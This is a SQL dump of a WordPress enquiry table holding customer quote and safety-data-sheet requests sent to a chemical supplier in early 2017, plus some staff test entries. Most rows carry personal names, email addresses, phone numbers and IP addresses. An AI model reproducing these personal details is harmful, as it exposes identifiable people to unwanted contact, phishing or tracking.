INSERT INTO `wp_enquiry_detail_new` VALUES (406, 'Jacques Sills', 'sillss@videotron.ca', 'Cannot strip adequatly painted parts with aviation\nepoxy -poly strippers.I tested PTI from Spruce seller  and got mediocre results with multiple\nscenarios and waiting time.\nCan help on this?\n\n\n\n\n', '', 'Epoxies coatings removal-1963 Hughes Helico.269A', '137.175.194.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:11:"14507468955";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-15 14:31:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (407, 'Jeff spears', 'Jspears@commonwealthextracts.com', 'Need price\n', '502408-3478', '', '70.198.131.131', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-16 15:05:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (408, 'james', 'james@agsingapore.com', 'Dear Sir,\n \nI am keen on your product for the trans-DCE (SION) for resell in Singapore market. I have user who are using npb from Kyzen, Dipsol, Abzol, to name a few. I would like to request from you the MSDS , datasheet and the price for 4- 8 drums (50 gal) for a start. Do you have additives that is added to make it non flammable also?\n \nThank you and look forward to hear from you soon.\n \nBest regards,\nJames\n', '+6564874408', 'SION', '115.66.49.141', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-18 08:44:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (409, 'Cherie Uhrich', 'cherie.uhrich@nexteer.com', 'Need to order 2 boxes', '989757-5085', 'Need to order 2 boxes', '199.107.26.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-18 15:43:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (424, 'Mary Jo Larson', 'mlarson@omega.com', 'please provide price and leadtime (1) quart MS-472C\nneed asap.', '740965-9340', '$ &amp; LT', '65.40.70.123', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 14:56:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (411, 'Chris Throwe', 'cthrowe@earmark.com', 'I am looking for 1 gallon of MS-557.  Could you provide pricing and availability.\n', '203777-2130', 'Price and Availability', '71.235.75.179', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-19 18:59:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (412, 'Matt Benton', 'mbenton@ilc.com', 'I also would like a quote on the Conformal Coating Stripper.  does that come in anything smaller than 1 gallon also?  ', '', 'Price Quote', '173.161.4.177', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-20 22:15:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (413, 'Mohamad ElMaoud', 'B00040419@aus.edu', 'Dear Respected,\n\nI need a supply from your products Hexion epon 862, epon 828 and epikure W to be delivered to Sharjah, United Arab Emirates. Kindly send me a quotation with the three products including the delivery procedure and expenses.\n\nRegards,\n\nMohamad ElMaoud\n00971504179188', '', 'Price quotations', '92.99.142.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-21 07:17:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (425, 'Matt Sargent', 'matthew.t.sargent.civ@mail.mil', 'Please provide a price quote for 1 can of MS-470S', '973724-5137', 'Price Quote - MS-470S', '131.92.192.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 14:56:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (426, 'Marlo Kempf', 'mmk@vme.com', 'Please provide price for Qty 4 cans of MS-475C and  MS-477C Qty 1 Quart.\n\nThanks,\nMarlo', '480513-8979', '', '72.196.87.238', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 16:19:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (427, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'testresetsestse', '', 'tes', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"784";s:5:"title";s:7:"GPL 203";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_295431182.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 16:25:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (428, 'Patti Ann Edwards ', 'pattiann@pkgsys.net', 'Epikure 3125 Gal.\nQty. 3\n', '661388-9826', 'Quote (Packaging Sy', '12.164.31.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1866";s:5:"title";s:15:"EPIKURE™ 3125";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3125.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 16:52:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (429, 'Zeljko Osman', 'zeljko.osman@lumentum.com', 'I ma very interested to try out release agent.  Could you please provide me with your distributor in Canada, Ontario, Ottawa area?\n\nThank you.\nZeljko Osman\n\nTechnical Specialist\nOptical Communications\nLumentum\n61 Bill Leathem Drive\nOttawa, ON, K2J 0P7\n+1-613-843-2338\n\nwww.lumentum.com\n\n', '613843-2338', 'PTFE release agent', '165.225.36.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 17:26:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (430, 'Mike Street', 'mstreet@ouc.com', 'Hello,\nI need pricing on Krytox XHT-BDZ in the 5kg, 7kg, &amp; 20kg pail. It is for budgetary purposes.\nThank You,\nMike Street\ncell 407-222-8652', '407434-3191', 'Pricing on Krytox XHT-BDZ', '12.27.131.216', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 18:11:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (431, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'please be successful', '', 'logged in', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 19:29:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (432, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'test run', '', 'logged out g zip compression trial 1', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 19:30:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (433, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'test', '', 'gzip round 2', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 19:54:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (434, 'donald lewis', 'dlewis@nyle.com', 'GPL207 Krytox.', '207989-4335', 'price and availbility ', '66.231.214.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"6";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 20:28:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (435, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'gzip comp round 3', '', 'final test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 20:31:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (436, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasd', '', 'asdasdasdasd', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"769";s:5:"title";s:7:"GPL 201";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_117518518.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-25 20:42:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (437, 'Randy Straley', 'gstraley@harris.com', 'Please advise cost and delivery for both the 1 kg jar and the  5 kg jug.', '321724-4694', 'RFP for Krytox GPL 103', '158.147.105.89', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 12:53:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (438, 'Prashant', 'intern1@owwco.com', 'it would be nice of you guys if you can send me the safety data sheet for MS-122AV', '937867-7587', 'sds', '24.142.187.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 13:57:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (439, 'Ken Ng', 'daibee@aol.com', 'I would like to request a sample of your Miller-Stephenson Release Agent/Dry Lubricant MS-122AD for evaluation purposes. \n', '347886-3780', 'sample request', '216.81.81.85', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 14:52:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (440, 'rick millward', 'rick.millward@falconjet.com', 'sds sheet', '201393-8127', '', '69.74.23.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 15:46:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (441, 'Noshir Pesika', 'npesika@tulane.edu', 'Hi,  I am a faculty a Tulane University.  We are exploring the use of your epoxy in one of our electrochemical applications.  Would it be possible to receive a sample of your EPON Resin 1004F?  If not, what is the smallest size and price for the product.\n\nThank you.', '504865-5771', 'Price inquiry for EPON Resin1004F', '129.81.142.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"939";s:5:"title";s:13:"EPON™ 1004F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1004F.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 18:14:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (442, 'Liat Rosenfeld', 'liat.rosenfeld@sjsu.edu', 'Can I please get a quote for Krytox 157 FSL to be used in a research lab in San Jose State University. ', '408924-4051', 'Quote  for Krytox 157 FSL', '130.65.153.187', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-26 22:29:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (443, 'Glen', 'gcole@tmt.org', 'Quote price and delivery  of MS-111 Epoxy Stripping Agent please', '626395-1632', 'Quote price delivery please', '131.215.210.152', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-27 02:14:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (444, 'kaushika Banerjee', 'kbanerjee@acepiettes.com', 'Need to find pricing for the Krytox GPL 2016 grease price. Also need to find the price of Krytox GPL 106 oil applicator.', '832295-0882', 'Krytox GPL 206 grease', '206.54.203.173', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-27 17:26:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (445, 'mn', 'Manaoow@outlook.co.th', 'price', '', '', '203.158.2.97', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-28 15:37:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (446, 'james walekr', 'james.m.walker@baesystems.com', 'Please quote for epon resin 828.  The image on your web site has what appears to be a 1 qt bottle.  This should be more than sufficient.  What quantities do you sell?', '603885-4979', 'Epon resin 828', '73.143.244.182', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 03:05:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (447, 'Gary Van Booven', 'gary.j.vanbooven@boeing.com', 'I am looking for a Waterborne release agent that will dry at room temperature. I want to be able to apply a very thin amount.', '314777-8162', 'ReleaSys 8200', '130.76.96.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"297";s:5:"title";s:13:"ReleaSys 8200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys-82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 15:56:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (448, 'Prashant', 'intern1@owwco.com', 'Hey I recently got the molding agent MS-122 E and would need a safety data sheet to move ahead. It would be nice if I can get the SDS.', '937867-7587', 'SAFETY DATA SHEET', '24.142.187.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 16:28:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (449, 'Tammy Rider', 'tammyr@wulco.com', 'Good afternoon\nCan you please send me pricing for your product 907? Please advise of any order mins etc.\n\nThanks\nTammy', '513679-2635', 'Epoxy 907', '216.68.52.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 17:09:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (450, 'rwlodek', 'rwlodek@kcp.com', 'Hello, I am looking for a quote for GPL-100 at 0.5kg.  Do you also have a recommended cleaning solvent. \n\nThanks Raphael Wlodek', '816488-6978', 'Quote request', '199.89.130.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 17:19:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (451, 'Prashant', 'intern1@owwco.com', 'sorry for the previous one but i need safety data sheet for MS-122 SE as well you sent me for MS-122 E instead of SE.', '937867-7587', 'SAFETY DATA SHEET', '24.142.187.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 17:33:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (452, 'Christian Steinmetz', 'c.steinmetz@osresearch.com', 'Good afternoon,\n\nWe had purchased a 8oz tube of Krytox XHT-BDZ from you a few years back.  We use this grease sparingly, but it is our go-to for a high temperature durable lubricant.  As we are approaching the end of this tube, I\'d like to get a quotation on (1) 8oz tube of Krytox xht-bdz.  \n\nThank you!', '856829-2800', 'Krytox-BDZ 8oz quotation', '75.147.76.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 18:56:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (453, 'Prashant', 'intern1@owwco.com', 'Hey i am inquiring  for safety data sheet for MS-122 SE.\nAwaiting a reply', '937867-7587', 'SAFETY DATA SHEET', '24.142.187.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-30 19:33:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (454, 'Nick Annese', 'nick.annese@gentex.com', 'Hello,\nWe are currently using the MS-122AV and we would like an SDS to give to our safety team.\n\nThank You.', '616772-1800', 'SDS Information', '204.19.223.246', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"0";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-31 20:06:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (455, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdadasd', '', 'test logged', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 14:34:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (456, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasdasd', '', 'test logged out', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 14:35:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (457, 'Olivier Cote', 'olivier.cote@glencore-ca.com', 'HI to you at Miller-Stephenson,\nIs XP1A7 is compatible with O2 environment? \n\ncould you provide a quote for a 20kg jug.  what is the related volume or specific gravity of Krytox oils? \n\nregards,\n\nOliver', '918762-7764', 'oxygen compatible', '209.226.1.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1001";s:5:"title";s:6:"XP 1A7";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-11.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 16:39:26', '', NULL, '', '', '', NULL, '', ''); 
